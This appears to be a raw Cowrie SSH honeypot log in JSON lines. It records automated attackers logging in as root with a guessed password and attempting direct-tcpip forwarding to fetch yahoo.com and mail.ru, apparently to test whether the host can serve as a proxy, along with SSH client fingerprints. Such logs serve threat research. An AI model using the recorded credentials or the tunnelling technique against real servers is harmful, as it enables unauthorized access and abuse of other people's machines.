{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:45.953683Z","src_ip":"77.83.207.83","session":"5631c6c1331a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":26672,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:26672","sensor":"my-vps","timestamp":"2025-08-31T03:45:46.096142Z","session":"5631c6c1331a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:46.146012Z","src_ip":"77.83.207.83","session":"5631c6c1331a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:46.196772Z","src_ip":"77.83.207.83","session":"5631c6c1331a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":51101,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fbe54d041b2","protocol":"ssh","message":"New connection: 77.83.207.83:51101 (1.2.3.4:22) [session: 3fbe54d041b2]","sensor":"my-vps","timestamp":"2025-08-31T03:45:46.245750Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:46.246585Z","src_ip":"77.83.207.83","session":"3fbe54d041b2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:46.296354Z","src_ip":"77.83.207.83","session":"3fbe54d041b2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:46.544778Z","src_ip":"77.83.207.83","session":"3fbe54d041b2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":21687,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:21687","sensor":"my-vps","timestamp":"2025-08-31T03:45:46.595768Z","session":"3fbe54d041b2"}
{"eventid":"cowrie.session.closed","duration":"38.7","message":"Connection lost after 38.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:46.622471Z","src_ip":"212.227.235.229","session":"1e043fb059c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:46.645864Z","src_ip":"77.83.207.83","session":"3fbe54d041b2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":13787,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:13787","sensor":"my-vps","timestamp":"2025-08-31T03:45:46.788603Z","session":"3fbe54d041b2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:46.838563Z","src_ip":"77.83.207.83","session":"3fbe54d041b2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":17540,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:17540","sensor":"my-vps","timestamp":"2025-08-31T03:45:46.980241Z","session":"3fbe54d041b2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:47.030256Z","src_ip":"77.83.207.83","session":"3fbe54d041b2"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:47.081400Z","src_ip":"77.83.207.83","session":"3fbe54d041b2"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":51191,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef05363f58b9","protocol":"ssh","message":"New connection: 77.83.207.83:51191 (1.2.3.4:22) [session: ef05363f58b9]","sensor":"my-vps","timestamp":"2025-08-31T03:45:47.130302Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:47.131423Z","src_ip":"77.83.207.83","session":"ef05363f58b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60420,"dst_ip":"1.2.3.4","dst_port":22,"session":"06bc6d1c0b1f","protocol":"ssh","message":"New connection: 212.227.125.160:60420 (1.2.3.4:22) [session: 06bc6d1c0b1f]","sensor":"my-vps","timestamp":"2025-08-31T03:45:47.132204Z"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:47.181090Z","src_ip":"77.83.207.83","session":"ef05363f58b9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:47.429791Z","src_ip":"77.83.207.83","session":"ef05363f58b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":9312,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:9312","sensor":"my-vps","timestamp":"2025-08-31T03:45:47.480562Z","session":"ef05363f58b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:47.530387Z","src_ip":"77.83.207.83","session":"ef05363f58b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":30393,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:30393","sensor":"my-vps","timestamp":"2025-08-31T03:45:47.672113Z","session":"ef05363f58b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:47.722495Z","src_ip":"77.83.207.83","session":"ef05363f58b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":26888,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:26888","sensor":"my-vps","timestamp":"2025-08-31T03:45:47.864046Z","session":"ef05363f58b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:47.913926Z","src_ip":"77.83.207.83","session":"ef05363f58b9"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:47.964792Z","src_ip":"77.83.207.83","session":"ef05363f58b9"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":51274,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cde37b7256e","protocol":"ssh","message":"New connection: 77.83.207.83:51274 (1.2.3.4:22) [session: 4cde37b7256e]","sensor":"my-vps","timestamp":"2025-08-31T03:45:48.014284Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:48.014978Z","src_ip":"77.83.207.83","session":"4cde37b7256e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46006,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fb704ece54f","protocol":"ssh","message":"New connection: 212.227.235.229:46006 (1.2.3.4:22) [session: 9fb704ece54f]","sensor":"my-vps","timestamp":"2025-08-31T03:45:48.044499Z"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:48.065227Z","src_ip":"77.83.207.83","session":"4cde37b7256e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:48.314681Z","src_ip":"77.83.207.83","session":"4cde37b7256e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":17671,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:17671","sensor":"my-vps","timestamp":"2025-08-31T03:45:48.365777Z","session":"4cde37b7256e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:48.415925Z","src_ip":"77.83.207.83","session":"4cde37b7256e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":30280,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:30280","sensor":"my-vps","timestamp":"2025-08-31T03:45:48.556422Z","session":"4cde37b7256e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:48.606426Z","src_ip":"77.83.207.83","session":"4cde37b7256e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":22944,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:22944","sensor":"my-vps","timestamp":"2025-08-31T03:45:48.748321Z","session":"4cde37b7256e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:45:48.760972Z","src_ip":"212.227.235.229","session":"9fb704ece54f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:45:48.761717Z","src_ip":"212.227.235.229","session":"9fb704ece54f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:48.798527Z","src_ip":"77.83.207.83","session":"4cde37b7256e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:48.849323Z","src_ip":"77.83.207.83","session":"4cde37b7256e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":51378,"dst_ip":"1.2.3.4","dst_port":22,"session":"3851f164f651","protocol":"ssh","message":"New connection: 77.83.207.83:51378 (1.2.3.4:22) [session: 3851f164f651]","sensor":"my-vps","timestamp":"2025-08-31T03:45:48.898334Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:48.899134Z","src_ip":"77.83.207.83","session":"3851f164f651"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:48.949618Z","src_ip":"77.83.207.83","session":"3851f164f651"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:49.200138Z","src_ip":"77.83.207.83","session":"3851f164f651"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":3312,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:3312","sensor":"my-vps","timestamp":"2025-08-31T03:45:49.251108Z","session":"3851f164f651"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:49.301364Z","src_ip":"77.83.207.83","session":"3851f164f651"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27141,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:27141","sensor":"my-vps","timestamp":"2025-08-31T03:45:49.444458Z","session":"3851f164f651"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:49.494610Z","src_ip":"77.83.207.83","session":"3851f164f651"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":28070,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:28070","sensor":"my-vps","timestamp":"2025-08-31T03:45:49.636456Z","session":"3851f164f651"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43046,"dst_ip":"1.2.3.4","dst_port":22,"session":"74fc0d1cee63","protocol":"ssh","message":"New connection: 212.227.235.229:43046 (1.2.3.4:22) [session: 74fc0d1cee63]","sensor":"my-vps","timestamp":"2025-08-31T03:45:49.643331Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:45:49.644056Z","src_ip":"212.227.235.229","session":"74fc0d1cee63"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:49.686616Z","src_ip":"77.83.207.83","session":"3851f164f651"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:49.737681Z","src_ip":"77.83.207.83","session":"3851f164f651"}
